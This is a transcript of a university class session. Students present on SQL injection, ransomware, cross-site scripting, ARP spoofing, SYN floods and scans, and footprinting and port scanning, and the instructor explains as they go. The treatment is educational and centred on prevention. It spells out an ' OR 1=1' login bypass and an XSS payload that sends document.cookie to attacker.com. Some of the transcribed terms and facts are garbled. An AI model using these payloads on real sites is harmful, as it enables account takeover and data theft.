Good morning, Raja Hamsa.
Good morning, sir.
Good morning, all. So, what are the numbers, today's numbers who are going to present?
From 4 to 6, sir. 4, 5, 6.
Hello. Sai. What are the numbers,
Yes, sir.
today's numbers? What are the numbers?
Rule number 4, 5, 6, sir. 3%.
Okay. Yeah. Rule number 4, are you available? So, inform them, ask them to join and give the presentation.
Yeah, okay, sir.
Sir, can I start? Sir,
Yes, you can.
Sir, rule number 4, sir.
Okay.
Sir, I am unable to share it, sir.
Why you can? Yesterday, acha. What is the error?
Sir,
One, I will
ocean is
make it. I will make a
make,
presenter. What is your number? Name Dikshita kada.
yes, sir.
Dikshita. Okay, go ahead.
Good morning, everybody. Today I'm going to give the presentation on the SQL injection, ransomware, and cross-site scripting attacks. These are the contents I'm going to discuss today. Coming to the SQL injection. SQL injection is one of the most common and dangerous web application websites, and it happens when an attacker enters the malicious SQL code into like input fields like login forms or the search boxes. So the main reason for the SQL injection occurs is improper input validation. That means the applications attackers use the input directly and also uses it in the SQL queries by without checking for the filtering it. So because of this weakness, attackers can do several harmful things. They can bypass the login authentication and the steal sensitive information, and they can also modify the details. So it can occur due to the
1 minute.
improper
1 minute.
validation.
Here in SQL injection,
Yes, sir.
every web application is connected to the database. Please all of you listen carefully. We have a MVC pattern or any some framework. General framework for a web application is it should have a input and output. Then middle we have a controller, model view controller architecture. So the moment once you submit your form, data will go to the database, right?
Yes,
So
sir.
database, while sending your query to database in the form of a SQL, there may be a possibility of capturing entire data of the server by doing some meta characters into the query. Okay. So this is the common form of a SQL injection. It is connected to web application because we are in the web application is generally framing and preparing data and share to all the users based on the database. That is why SQL injection is connected to the web application. Am I clear?
Yes, sir.
Go ahead.
Next, coming to the SQLi types. First is the classic SQLis. This includes the two subtypes. First one is the error-based SQL. In this, the attackers force the database to generate the error message, and these error message reveal the information about the database structure. And next one is the union-based. This is the in this the attackers adds a union selector query to fetch the additional data from the other tables. The one more one more type is the blind SQL. In this type, the application doesn't show any error, but the attackers morely depend on the indirect responses. So in this, they have the two subtype. They includes Boolean based and the time based. In the Boolean based, the attacker sends the true or false questions and observes how the page changes. And next one is the type based. In this, the attackers use the delays like the sleeps of 5. This is the function, and it is used to confirm if the certain condition is true or false. And next type is the out of band SQL, and this is the less common user type. It is used for the external channels like the DNS and the HTTP request, and these are the requests used for the extract the data if the normal challenges or the black. So these are the overall SQL types. Next, coming to the SQL example. If the user enters the input like the OR1 equals to 1 in the user field, and if the backend query becomes the select a star from user where username equals to OR1 equals to 1, because 1 equals to 1, it shows the always true. So the condition gives the successful rate. So the database returns a valid row without checking the real password. So this allows the attackers to log in an admin without knowing the password. The small flow diagram on the right side shows the process of the user input. User want to take the input, and then after getting the input, it started the query structures. Then query builded. After the query builded, it gets to the SQL injection. So by taking the SQL injection, it get to the data lake. This is the overall SQL example, sir.
Good.
Next coming to the SQL prevention techniques. There are some prevention techniques includes the six. First one is the parameterized queries. This is the most effective protection. It separates the SQL code from the data, so the attackers cannot inject the malicious queries. And next one is the input validation. Input validation is also known as whistling. This is the when it occurs only when permitted characters like the letters, digits, and alphabets. So, uh, for only the specific characters and the blocking special characters, it will prevent the injection. And next one is the escaping special characters. So, in this, before sending the user input to the database, the harmful characters like the codes or the escaped characters, uh, these are occur safely. And next one is the using ORM frameworks. In this, the framework like Hibernate or Django ORM, which will automatically build the safe queries. So next one is the least privilege principle. In this, databases account should have only necessary permissions. Even though the completion is the difficulty is the more, the attacker cannot use this ORM frameworks. So they are not able to get the detailed information of the user. So it can cause the major damages. And next one is the last one is the web application firewalls. Web application firewalls detect and block the suspicious SQL patterns before reaching on the backend. So these are the overall prevention techniques. Next, coming to the ransomware. In simple words, we can say that ransomware is a very dangerous type of the malware, and that either the encrypts the victim's file or the completely locks the system. So they can also demand the money, and they call as the ransom, which they will store the uh, inputs access to store the access. So the main characteristics of the ransomware is they uses the strong encryptions. Encryptions means which makes the recovering file almost impossible without a key. So, and it mainly spreads through the phishing emails and malicious attachments. And this means the victims often get infected by simply by opening a file. So, once the system is infected, the ransom note is the displayed asking and for the payment, and also for the usually it occurs in the cryptocurrency. So because of its rapid growth and the large impact value, ransomware is now considered as one of the fastest growing cybercrimes. And next, coming to the types, they the types includes the four types. First one is the crypto ransomware. Crypto ransomware is the most common and the dangerous type. Uh, and in this, the encrypts the user's personal or organizational files, making them completely unreadable. So the attackers can demand the ransom. Ransom is nothing but the demanding the money. Uh, so for the in exchanging for the description key. So for this, the best example is the which is attacked in that. So that the user cannot access anything. In so that it blocks the system and shows the image like demanding payable for to unlock it. So in this, the example is FBI money bank locker. FBI money bank locker is will scare the victims by showing the fake message claiming by the evaluating the law. These are the two types, and next we include the next one is the scareware. Scareware is doesn't actually encrypt or the lock anything, but instead it shows fake virus alerts to scare the users uh, for the paying of the money for the paying of money. So it pretends to the antivirus software. For example, fake AV. In this, the malware pops up the fake warnings like the your PC is infected, and they are used to ask the user to fix the issues. Like this, the attackers use it to ask the users. And next one is the lakeware. Lakeware is this is the even more threatening, and lakeware steals the sensitive data first, then encrypt the files. In this, the attackers threaten the published stolen data online. And the next coming to the example is the message ransomware. In this, they leak the corporate data and force companies to pay the ransom, uh, to pay the money. So these are the overall four types of the ransom. Next, coming to the ran ransomware case study. This is the case study which occurred in the 2018. The attack usually starts with a phishing email that looks genuine. But when the user opens the attachment, the ransom silently installs itself. It immediately starts the encrypting important files in the background. So once the files are locked, the ransom note appears on the screen telling that the victim that only with the way to recover is to only whenever you pay the money, it will it will stops the detecting the user information. So they are demanding the money. These are occur usually in the cryptocurrency. At this point, the victim cannot access their files, and they taken under the pressure to pay the money. So this is the flow chart. First, the user receives the phishing email, and then they opens the attachment. Then the ransom silently encrypts the file. So after that, they demands the ransom. After demanding, the victim must pay into the cryptocurrency. These are the overall ransomware case study. Next, coming to the ransomware prevention and the response. Ransomware measurements are like regular backups and updated antivirus, email filtering, and avoiding opening unknown attachments, and keep system patched. In the regular backups, in which includes that keeping offline or the cloud backups. This ensures the files are kept without restoring them. Um, by updating the antivirus, which helps the detecting the malware before it spreads. So, and next is the email filtering. Email filtering is nothing but the blocking the phishing mails and also the malicious attachment. Next, coming to the responses. In the responses, including like disconnecting the infected devices from the network to stop the spread, and the report the incident to the cybercrime cell, and the next avoiding the ransomware unless the absolutely necessary. So this gives the guarantee for the data recovery whenever they reporting the cybercrime cell. Like so, for the backup purpose, we can also use the restored files. These are the responses and the preventions of the ransomware. Next, coming to the next topic is the cross-site scripting. Cross-site scripting. Cross-site scripting is also known as XSS. XSS is the client-side attack, which means the attack happens when the user's browser, but it is not on the server. So in this attack, the attacker injects the malicious JavaScript into the website. When the other users visit that page, the malicious code run automatically in their browser. So in this, which makes the we can say that the XAS is the dangerous, but it can perform the uh, actions like stealing the session cookies, which can let the attackers over the user accounts. And next one is the redirecting user. This redirecting user they can use for the fake or the malicious website. And next is the creating the phishing pages. By creating the phishing pages, they can log in easily. So after that, defacing the website. Defacing the website means modifying their appearance. Next, coming to the XSS types, there are the three types. First one is the stored one. This is the most dangerous type. The malicious script is stored permanently in the dataset. For example, in the comments, post, or the profile feeds. Since it is stored, every user who views that the contents get affected, which makes the impact very high. So, stored access is the most dangerous one. And next one is the reflected access. In this type, the malicious script is the part of the URL parameter. In this, the most part is the URL. In this, whenever it's executed, the victim is clicks on the attacker's click. Where in this type, the attackers use it to the attackers use it to steal the information by using the link. This is the common in the search bars or the login forms. And next one is the DOM-based accesses. Here, the attack happens entirely on the client side only, inside the browser, and the JavaScript running on these pages, which modifies the DOM. DOM is nothing but the document object model, and the browser you executes the malicious script. So in this, there is no the server interaction is required. These are the overall types. And next, coming to the example. First one is the example one. If the user enters the following script in the search bar, like a script attack and the script, and the application directly displays the input without filtering, and this script will run and shows an alert message, and this proves that the site is the vulnerable. So next coming to the example two. This is come under the storage x-axis, and here the attackers post the comment like the script document dot location equals to http colon slash attacker dot com slash deal question mark c equals to plus document dot cookie script close. In this script, the script sends the victim's cookie to attacks the servers. Once the attackers gets the cookie, then only they can hijack the victim's session. So login without the password, which takes the attackers more easily for the fetching the details of the user. Next, it will
1 minute, Dikshita, 1 minute. See, dear
okay.
students, if you can see here, this is what script end opening tag and the script closing tag. In middle, there is a data. Actually, while entering the data, user should enter data like comment, like is the book is very good. While purchasing the book, say example, the book is very good. The book gives a lot of information. Or sometimes we may write book is very bad. There are no diagram like that. We may write some comments. But attacker,
Yes,
what he
sir.
will do, he will send data in the form of code. This is the code, document location equal to so and so that he kept now. That is a code.
Code.
Actually, data will go in the form of data. Instead of the data is going in the form of a code. So then what happened? This script tag is executed by your browser because browser knows a script. Browser knows the script tag. So what happened? This is going to be executed. Once it is executed, he will get, whoever the user submitted this form, he will get cookies shared by the server. So cookie means, I already told you, cookie means which is the ID generated and shared at a client machine. Okay,
Yes, sir.
and the session is also an ID generated by the server, which is stored in the server's machine. But cookies, once a user submitted this line of code in the comments, this code, this is actually, we thought it data only, but the browser knows about script, because the script tag is known to the browser. It will execute this data in the form of a code. Then what happened? It released the ID to the attacker. Attacker will got that ID. Once attacker get the ID, he can communicate to the server. Then actual user is yourself. Instead of that, attacker is communicating to the server. This is what a example of a stored XSS. Okay. So now, how to solve this? How to solve this? For that, whatever the cookie, whatever the data entered in the comment box, if there is a character like a less than or greater than, that can be uh, sent to the browser. In middle, there may be filter, like she mentioned the last slide, escaping characters. What is that? Here, whenever the character is less than, it may be converted into, encoded into ampersand LT. Browser doesn't know, then browser thinks it is a ampersand LT. It is a data only, because it is code now. You have to convert it into data. How? Wherever there is a special characters which is related to the query formation. Anytime, any query if you can take, it should be under script tag only, because script tag only known to the browser. So script tag you have to convert into ampersand LT script ampersand GT. And here ampersand LT and slash and script and ampersand GT. If it goes like that, it will go in the form of data only, not in the form of a code.
Okay.
Like that, before going to send this data to the server in your browser, in your source code, you have to convert all the special characters into encoding characters.
Encoding.
So less than is the ampersand LT, greater than ampersand DT, apostrophe is ampersand AMPOS. Okay, like that, all special characters are getting encoded. While coming to the user, again it comes in the form of less than only. How?
Yes.
The ampersand LT converted into less than.
Yes.
Okay. If you made these changes both at client and server side, if you have a special program to validating your code, you can stop the attacks. So this is the solution for XSS. See, just I'm telling you for curiosity, you have to understand how the attacks are happen, how to stop, how to prevent. Okay, am I clear?
Yes, sir.
Okay.
Next, coming to the prevention techniques. In this
Yeah, that's what
included the
output
five
encoding.
five prevention techniques. First one is the input filtering. In this, validating the all user inputs, which allows the only safe characters. Earlier, as mentioned that I have mentioned the characters, only possible things like the special characters, only the special characters includes, and the block the harmful ones. So next one is the output encoding. As the earlier saw discussed like the output encoding. So in this, before showing the user input on the web pages, the encoding the special characters, so they cannot run as the JavaScript. For example, in the previous one, we can seen as the less than. The less than we can say as the ampersand LT. Like that, the encoding will be occurs. Next one is the enabling the content security policy, and this is the security header that which tells that the browser that which scripts are the allowing to be run. So whenever the if the malicious code is also injected, the CSP policy will block that code. And next one is the for avoiding the unsafe Java function. Uh, this is like the inner HTML. The functions like such as the inner HTML, which directly inject the HTML into the pages, and this is will be the very risky. But by using the safe alternative like the text content or the inner text, by using this, we can avoid the JavaScript functions. And next one is the use secure frameworks. So the modern frameworks like the React, Angular, and the Django, by using these frameworks, we can automatically escape the HTML and the reduces the XSS risk. So by applying these techniques together, we can significantly reduce the chances of the XES attacks. So these are the overall prevention techniques. Thank you, sir.
Good. So all of you, please follow this slide and can understand. I think Dikshita, have you prepared this from your book or what?
Textbook only, sir.
Okay, good. So please go through that and this may be useful to you for your preparation as well. Okay, next. Good presentation. Next. Yeah, Jasmine, I am going to make you as a presenter. Is it okay?
Roll number 5. Okay.
Hello.
Yes, sir. It's still showing as you can't share content.
Just now I made you as presenter. Verify once.
Oh.
And yeah, Jasmine, tell me. I just now made you as a presenter. You verify.
No, sir, it's still showing us can't share the content.
No, no, no. You are presenter. Just to stop it and start again. Click on share. In your screen, there may be a option like share.
Yes, sir. It's coming now.
Yes, you click it, it will come.
Sir, is it visible, sir?
Yeah, it is visible.
Oh, okay, sir.
So those who are already
Sir,
presented the slides, so keep this, format only. And if possible, add the logo also, 47 years logo. You want me
okay, sir.
to share, I'll share it to you. 1 minute. Uh, Okay, give me your mail ID.
So mine, sir.
Not yours, group ID, because I want to forward it to all of you. Because from today onwards, wherever you keep any report and all, you have to keep our logo, college logo. Give me your mail ID, I'll forward it to you.
My mail ID, sir.
Not yours, group ID.
Oh, wait.
If I give to you group ID, everybody will get it, right? mtechcsc-2025cbat.googlegroups.com.
But we don't have any group ID, sir, actually.
Yes.
No one was
I
given
could
ID.
mtechcsc-2025cbat.googlegroup.com is there, something.
But we don't know whether our mail IDs are linked to that. Like we're added in that.
mtechcsc space cbat 2022, mtechcsc cbat 2020. This is yours only, I think. Just to verify your mails, I think. I'm sending mail just to verify. Whether it
Yeah,
comes.
okay,
I think 2025 yours only, na? That's what.
2026, like 4 to 6, sir.
Hope you received mail, I think. Check it once. Have you received it? Verify your mails.
No, sir, we have not received
Haven't
any.
received.
Hmm?
No,
We
sir.
didn't receive any mail, sir.
Oh, then who's this? mtech csc-2025 at cbat.ac. Okay, then how to share? In the chat box, it is not allowing to send the details.
Sir, you can send it in WhatsApp group, sir.
Okay, I'll do one thing. Content. The host or co-host has not allowed participants to transfer files. Why? Allowed to transfer. Not this one, Amma. I will WhatsApp you then. That's a good idea. Okay. So from today onwards, if you want to do anything related to college, you have to keep that logo instead of keeping something else. That will give everything about college. Okay.
Okay, sir.
You have received it.
Yeah, sir, just on this.
Jasmine, just update that into your PPT.
Okay, sir. Right now, sir.
Possible you can do what is wrong. Because everybody know now what is we did. That's it. Yeah, that's it. So it will give you everything. Okay. So this you have to keep in your PPTs or your books, your presentations, wherever you want. You can keep this logo. Okay.
Okay, sir.
Mhm.
Good morning, everyone. My name is Jasmine. Today, my topic is on ARP spoofing attacks, synchronized floods, and detecting synchronized scams. So, what exactly is an ARP? So, ARP it stands for like Address Resolution Protocol, and this protocol it is used in LANs to map the IP address of media access control addresses. So, media access control addresses it is an unique 12-digit identifier which is different for every other devices which is provided at the time of manufacturing. So this ARP it is a protocol which is used in a local network to addresses the MAC. So here when like one device want to communicate with the another, it first needs the physical address which is MAC address. So the ARP sends the broadcast messages and the device with the IP with the exact IP which the ARP sends the broadcast messages will respond it. So now the entire session or the entire data is again stored temporarily in ARP, that is Address
1
Resolution
minute.
Protocol.
One question. One question. What do you mean by broadcasting message?
Sir?
What do you mean by broadcasting?
Broadcasting message.
Don't take another way. I'm a person who will ask typical questions. What do you mean by broadcast? Because I think many of your friends also don't know about it. I know that. Only thing is, broadcasting means they will release the data, some source will release the data. Those who are in that connection, they will connect it and they can use. Those who are not connected to that, they cannot. Got my point? Means the source never thinks whether it will reach the exact person or not. Okay, he just release that news. Those who are tuned to that, they will get the news. Otherwise, they cannot. There is no preparation for a source. Destination should ready to receive the data. Just he will release the data. You got my point?
Yes, sir.
Clear?
Yes, sir.
Yeah.
So the key weaknesses of ARP is that it doesn't authenticate responses and any device can send a fake ARP reply. So this makes it vulnerable to spoofing. So what is ARP spoofing? So it is when an attacker sends a forged or like ARP replies to mislead the device. Here, the attackers impersonate another device, that is either it might be a router or victim, by linking to their MAC, that is media access control addresses. So what attackers achieve? So what, man in the middle interprets and alter traffic. So it occurs when usually when an attacker uh, positions themselves secretly between like two communicating parties. So it relays or it alters messages without knowing from the both the communicating parties. Session hijacking means like when an attacker take over a valid like user sessions. So sessions is what keeps you logged in after you have entered the password. So if an attacker steals your own session IDs, so they can be pretend to be you. So though this makes them to have access to your accounts or modify any personal details. And when come to data manipulation, here it is when the attackers alter or manipulate the data. So the due to this, the attackers can change account number, especially during any like financial transactions, or modify any data regarding amounts or regarding in online shopping. And credential theft. So here, credential theft is like steal any sensitive login information. It can be either usernames, passwords, again session OTPs, or so here, the attackers who are attacking the victims, they usually attack uh, the target using email logins or any banking passwords, social media accounts, and everything. So the main consequences of these credential theft might be like main is that identity theft. Next one is the financial loss, and some might even take over the account and impersonate as well. And next is denial of a service. So here this attack usually aims to make a system or a server unavailable to like prevent any like real users, legitimate users to from accessing that particular services. So the impact of this denial of service can be seen as when the websites stop responding or server crashes. So ARP spoofing, how it works. So first attackers scan the LAN. Here the first main thing the attackers do is that they first discover all the devices which are connected to the local network. So they use tools like Nmap, ARP scan, and net discover. So by using these tools, the attackers first identifies any potential target to make them the victim. Next, attacker find victim and the gateway router. So once the attacker identifies a potential target, the next step is that they scan the results, and attackers take the victim's IP address or the MAC address, because ARP spoofing it usually works by impersonating these devices. Once they have gotten the victim IP or MAC, the attackers send a fake ARP replies to the victim. So here, what exactly the attacker does is that it tells the victim that I am the router, so use this MAC ID for your. So the victim then updates that ARP with the false information. And once it's done, the attacker sends again fake ARP replies to the router. So here once the attacker sends the messages to the victim, the next thing that does is that it also tells the router that I am the victim, use my media access control protocol. So now the router also sends the victim replies to the attacker. So in this way, the attacker position themselves in between the victim and the router. So this is victim and the router. Next, detecting ARP spoofing. So here there are various indicators which can be used for detecting an ARP spoofing. First one is like frequent ARP reply packets, even like without request. Such as two different IP mapped to the same media access control. ARP cache entries changing repeatedly, and gateway media access control appearing different than usual. So these are the indicators which usually tells us that there is an ARP spoofing uh, happening. So for these to detect, we use detection tools such as Wireshark pattern, XSharp, next ARP watch, and IDS tools like Snort and Suricat. So for preventing ARP spoofing, there are four methods. First one is static ARP entries. So here static, it's like manually assigning any like fixed input to MAC mappings for any like important devices. So next one is like dynamic ARP inspection. It validates like every ARP packet before allowing it into the network, and it also blocked any spoofed ARP replies automatically. Next, port security. Here, it restricts the number of media access addresses. Uh, so this prevents the attackers spoofing like multiple devices at the same time. And encryption and network segments. So like even if the attackers interrupt with the traffic, they cannot read or they cannot change, they cannot make any changes in the data. So this helps in protecting any login credentials, messaging, or anything, any data related to the any data related to the banking. And network segmentation is that, like, it separates the sensitive devices into like different lands. It reduces the, so this helps in reducing the ARP spoofing attacks, or it limits the attacker movement in one segment. So what is synchronized flood? So here the next topic is like, what is synchronized flood? So it is an like a TCP based denial of service attack, where attackers exploit TCP three-way handshake by sending many synchronized patterns but never completing the connection. So here it sends many like synchronized patterns in the three-way handshake, but this connection is never been completed. So before understanding, let us understand what is normal TCP three-way handshake. So here, first the client wants to start a connection with the server, so it sends a synchronized path. So it contains like initial sequence number. So once the server receives the synchronized request from the client, it responds it with synchronized acknowledgement. So the server sends the synchronized sequence number, and the client sends the sequence number, and the server, it acknowledges the client sequence other than synchronized. And next, once the server acknowledges the client receives the acknowledgement packet back to the server. In this way, the connection and is established. But in synchronized flood, it sends multiple synchronized packet, but it never established or completes the connection. So what is synchronized word flooding? So attackers behave. So here, this is how the attackers behave to make sure the synchronized flooding works. It sends thousands or millions of synchronized packets to the server. Next, the server replies with a synchronized acknowledgement, just like it. The client sends the synchronized to the server, and the server is acknowledged. But the server does not send the final acknowledgement. Here, the server replies with the synchronized acknowledgement, but it does not send the final acknowledgement. The server holds the half-open connection. Connection table spills, and server cannot accept new connection. So in this way, the synchronized flood works. So these are the types of synchronized floods. The first one is like classic synchronized flood. So it is using random or a spoofed IP. So here, what exactly means is that attackers usually send a large number of synchronized packets to the target servers. So this results in the source IP address, which results in often getting spoofed or making it hard to trace. So since the server doesn't complete the TCP handshake by sending the final acknowledgement, so this causes like denial of service, and this usually is the most widely or the basic like version of the attack. So next one is botnet-based synchronized flooding. So here, thousands of zombie machines send a synchronized pattern. It means that a large network of devices, that is botnets, send synchronized patterns simultaneously to the server. So the traffic seems to be appears to come from like thousands of real devices, right? Not from the spoofed IPS we have seen in the classic synchronized flood. So uh, this is extreme. This results in extremely powerful because it uses that it comes from the distributed sources, and it makes it like hard to block huge, since each botnet sends like normal volume instead of rapidly sending huge volume of synchronization packets, it sends a normal volume, but combining all those botnets, it makes the server overwhelmed. So this common major botnets of synchronized flood in incidents can be seen in Mirari botnet attack. So RST floods plus synchronized floods. So here what the attackers resist legitimate traffic and floods with synchronized. So what exactly here it means that as the attacker uses a synchronized floods to fill up the server backlog queues. So simultaneously attackers also sent a reset packages like to disrupt the legitimate connections of the traffic. So this combination of RST flood and synchronized flood, it not only like overloads the servers, but it also breaks the active communication between the client. So the real world example for these SNS flood can be seen as a Mirari bot, which almost took down the Twitter, Amazon, and Netflix and GitHub. So detecting synchronized flood. So for to detect a synchronized flood, there are various indicators. The first one is that large number of synchronized packets from one or many IP addresses. Sending packets in the form of a single or in multiple using botnets is a one indicator. Unusually high number of half opening connections, synchronized packets without any corresponding acknowledgement, that is no connection being established from the server side, and CPU or memory spike. So since these are the indicators of detecting a synchronized flood, there are various tools which are Wireshark, Snort, Suricata, TCP dump, and Firewall. Here the Wireshark, it is like powerful packet sniffing tool. It analyzes the live network traffic. So next is the snort. Next is the snort. So it is used to detect any like malicious patterns. And suricata, it performs like any high speed packet analysis. So it detects any high volume synchronized floods, network scans, and TCP dump. So it is a command line tool. It captures the raw TCP packets. So it is mostly useful when there is a large number of synchronized packets. And firewall logs. So here the firewall logs, it records the allowed and the blocked traffic. It usually it is useful when the indicator shows an excessive like SN synchronized patterns attempt from same IP addresses or multiple IP ports. So, mitigating synchronized floods. So to mitigate the synchronized floods, there is a synchronized uh, cookies. So it's server avoids allocating memory until the final acknowledgement. So here, until and unless the final acknowledgement is being done, the server makes sure it doesn't allocate the memory. Firewall with limits the synchronized packets per second, blocking any spoofed IPs, and load balancers it blocks traffic spikes which can be seen, increasing backlog queue to make server more resistant. These are the mitigation techniques for synchronized floods. So what is next? The topic is synchronized scan. We have seen synchronized flood. So it is synchronized scan is a port scanning technique. It is where then attacker sends synchronous packet to check if the port is open, but it never completes and handshake. And why does attackers use the synchronized scan? Because it is fast, it is hard to detect, and it helps the attackers discover any vulnerabilities present. It is used before exploiting the system. How uh, uh, synchronized scan works, like for each port, the attacker sends a synchronous port. If the port is open, the server's replies as synchronous acknowledged. The next server sends RST instead of acknowledgement to avoid the connection. But if port is closed, the server replies with RST. If port is filtered, there is no response. So this allows attackers to identify the port state of the victim. The real world example which uses synchronized scans can be seen to open an SSH port, to open an RDP port, database, web services, or this mostly the attackers mostly perform this synchronized scan on a corporate network to identify its identity, like opening SSH port and web service. So we have seen how the attackers detect each port. So the major indicators for happening of synchronous scan can be like high volume of synchronous packets from multiple ports to multiple ports, or synchronous packets without any corresponding acknowledgement. RST packets sent by the attacker after receiving once the server receives the synchronized acknowledgement, the attacker, instead of acknowledging he sends RST a packet. So very fast port sequential scanning or unusual source IPs or spoofed IPs. So various tools for detection the synchronous scan is like Zeek, again Snort, Suricata, Wireshark, and firewall logs. So the conclusion is that the ERP spoofing, synchronized floods, and synchronized scans, they highlight the key vulnerabilities in our modern network system. So via ARP spoofing, it enables attackers to intercept or manipulate the traffic, whereas the synchronized flood, it overwhelms the servers to distribute its availability to the valid users. Whereas synchronized scan, it serves as a resonance to identify open ports of the victim. It helps the attackers to check the state of the port, whether it's open, closed, or filtered. So to overcome all this, a strong defense of network hardening is required, and to block these attacks. Thank you. Thank you, sir.
Yeah, good. Go to the back. Go back. No, not the previous one. Last button. Last button. Yeah. Here, see, here, SYN scan serves as reconsciousness. Ante it's nothing but it's a recce. Means what's going on. Because once you made a command SYN scans, it will tell you the open ports, the frequency sending data, okay, packets performance, like whatever the indicators you said na, in the previous slides. Those are all will come to know. So reconsciousness is one of the portion which we already learned in the first unit. It will let us know what are the possibilities that attack may happen. Okay.
Okay.
So it is like a recce. People are telling na before going to do attack, people will plan and do something. That's what. That is what reconsciousness. Okay. Right. Thank you. Okay. Very good. Very good. Yeah. Yeah. Do you have time for another presentation? Do we proceed or we can go with the next day? Who is number 6?
Yes, sir.
Are you ready, Rajita?
Yes, sir, I'm ready.
Okay, go ahead. Then, because this is the last presentation, right? I'll make you present. Now you try. I made you a presenter.
Yes, sir.
What is your topic?
Footprinting, IP scanner and port scanner, sir.
Okay. Good. Updated.
Yes. So, good morning, everyone. My topics are footprinting, IP scanner, and port scanner. So, in this presentation, we'll learn about the footprinting, types of footprinting, IP scanners, how IP scanners will work, and the port scanners, types of port scanners, port states in scanning, and the final summary. So, what is footprinting is nothing but the information gathering. Footprinting means collecting the information about the target, system, or an organization. This is the first step in hacking or security testing. Footprinting is the process of gathering information about the target from public sources before performing the attacks. So the main purpose of footprinting is understand the target network layout and to identify the potential vulnerabilities and to discover entry points for further attacks and collect organizational data like domain information, email IDs, and the technologies used. There are two different types of footprintings, and the first one is the passive footprinting, and the second one will be the active footprinting. Coming to the passive footprinting, this is a process of gathering the information about your target without making any direct interaction with its system. So there is no direct contact with the target. In passive footprinting, examples like search engine, here this is used to find the publicly available information such as company details, employee names, and the exposed documents, and the public records, which will provide the domain registration details such as the owner name, IP address, and the DNS servers and contact information. And the other example is social media, which helps to gather the employee information, company structures, locations, and the personal details. Next one will be the public websites. They will provide the details like technologies used and the contact pages and the directory structures. And the next type of footprinting is the active footprinting. Active footprinting, we will directly interact with the target system. This means the target may know someone is checking their network or not. Example include pinging a device and tracing the route and checking the DNS queries and the port scans. Here, this involves directly interacting with the target system to gather the detailed technical information. Examples are ping sweeps, means this will send the ICMP echo request to identify which hosts in the networks are alive. ICMP refers to the Internet Control Message Passing, and the trace routes are this will match the path packets to take to reach the target and identifying the routers and the network architectures. DNS queries will retrieve the DNS records such as IP addresses and the mail servers. Port scans, this scans the target port to identify the open services. And coming to the active versus passive digital footprinting, in active digital footprint, it involves intentionally shared online, and you can control what you share, like the information, and you can contribute to your online reputation. Examples name, email, address, and social media post. Coming to the passive digital footprint, unknowingly we left behind the information and subtly collected. You can't control what the data is gathered. Example like browsing history, device information, network data, etc. Coming to the IP scanner, IP scanner finds which devices are active in a network or not. IP scanner is a tool that will check the range of IP address to determine which devices are alive and reachable. It scans the group of IP addresses and shows which system is alive. IP scanner is used to detect unknown devices and prepares us for the deeper scanning. The main purpose is identifying the active devices in the network and to detect the unauthorized devices and to map the network, prepare for the further scanning like port scanning. So here is the working of the IP scanner. IP scanners work in 4 simple steps. The first step is define the ping. Here we will set a range of IP addresses. And the second step is send the ping request, which involves the IP scanner will send out a ping, essentially little message to reach IP address in the range asking, are you there? You can see here in the image. And the third step is checking for the responses. If the IP address is active, it will respond. The scanner then note down the devices which are connected to this IP address, its name, and sometimes even details about the device like its type or the services it is running. And the fourth final step is generating a report. Here this will create a report. The report shows the active devices and their IP address and the host name, MAC address, and sometimes open ports. So here MAC refers to the media access control address. The main function is unique hardware ID for each device. The next one is what information the IP scanners will collect. IP scanners will collect many details such as active or inactive devices and the host names and the MAC address and the response times. Active or inactive host refers to shows which device in the networks are currently online or not responding. Host names refers to displays the reliable name of each device like admin PC instead of just the IP address. And the next one will be the IP scanner will collect the MAC address also. This is a unique hardware address of each device network card, which is used to identify it on the local network. And the next one will be the response time. This shows how long the device takes to respond, indicating the network speed or the network's delay. This will help the administrator to understand the network and the device status. The third one will be the port scanner. Port scanner is nothing but the port analysis. This will identify the open, closed, and the filtered states on the targeted machine. Simply, a port scanner is a tool that will send the packets to specific ports of the target system to determine their status. So the main purpose of the port scanner is to find open ports and to identify the running services, to detect the vulnerabilities and to access the firewall rules. So now let us see the working of the port scanning attack. Here this image will shows how the SYN scan is nothing but an half open scan works, which is used to check if the port on the server is open or not. So the first step is the client will from client to the server. The client will send the SYN plus port number. The client send a SYN packet to the server asking is this port is open or not. So in the second step from the server to client, they will send the SYN plus the acknowledgement. If the server replies with the SYN plus acknowledgement, this means yes, the port is open. This will confirm that the port is active and listening. So the third step is from the client to the server. This will send an RST. Instead of completing the connection, the client will send an RST, which means reset. This means stop the connection. I don't want to continue. So this is why it is called a half open. The connection is never fully completed. So this is the working of the port scanning attack. So here coming to the conclusion, if the client gets the SYN plus acknowledgement, the port is open. The client immediately sends the RST to avoid making the full connection. This makes the scan very faster and harder to detect the attack. So this is the working of port scanning. So there are types of port scanners. The first one will be the TCP connect scan. This completely the full handshake. It is easy to detect, but also easy for the firewalls and IDS to detect. So and the second one is SYN scan, which is a half open scan as we have discussed earlier in the working of port scanner. This scanner will send only a SYN packet and stops after receiving SYN plus acknowledgement from server to the client. This does not complete the handshake, making it faster and harder to detect. And the third type of port scanner is UDP scan. This will check the UDP port and slow because UDP has no handshake. Fourth one will be the stet scan. This uses the unusual packets like FIN, null, or XMAS to confuse the firewalls. And it tries to bypass the detection systems like IDS or IPS by avoiding the normal connection patterns. These are the different types of port scans. And the port states in scanning. So there are four main states in scanning. The first one is open, closed, filtered, and unfiltered. In the open state of scanning, the port is active and the service is running on it. For example, HTTP on port number 8. In the closed state, no service is listening, but the port responds, meaning that the device is reachable. In the third state, filtered, the port is blocked by the firewall, so the scanner gets no clear response. The last state of scanning is the unfiltered. This means the scanner can reach the port, but it cannot determine whether it is open or not. So these are the different states in scanning. So coming to the final summary, we have discussed the four different topics: footprinting, IP scanning, and port scanning. Here, footprinting is nothing but gathering the information about the target, and its purpose is preparing for attacks and to identify the vulnerabilities. Some of the common tools are WHOIS and the Google Docking and Maltego. Next one will be the IP scanning, which means finding the active host in your network. The main purpose is identifying the devices, detecting the unauthorized systems. The common tools are Nmap, Angry IP, Scanner. Third one we have discussed is a port scanning, which means checking the port status on the target network. The main purpose is finding the open ports and detecting the services. The tools that have used are Nmap and Mascan. Yes, thank you. That's it, sir.
Okay, thank you. So give me your
Thank you,
attendance.
sir.
Rule number one. Rule number one. One. Rule number one. Hello. Is one is absent? Rule number one is absent. Okay, two. Number two.
Present, sir.
One absent, Dhamma. Two, three,
3 present, sir.
four,
Present, sir.
five,
Present, sir.
six,
Present, sir.
seven, seven.
Sir, she's in class, sir. Network issue.
Eight,
Present, sir.
nine,
Present, sir.
11, 12, 12. Absent.
Present, sir.
Array. 13,
Present, sir.
14,
Present, sir.
15,
Present, sir.
16, 16, 17, 18,
Present, sir.
19,
Present, sir.
20, 1, 2,
22 present, sir.
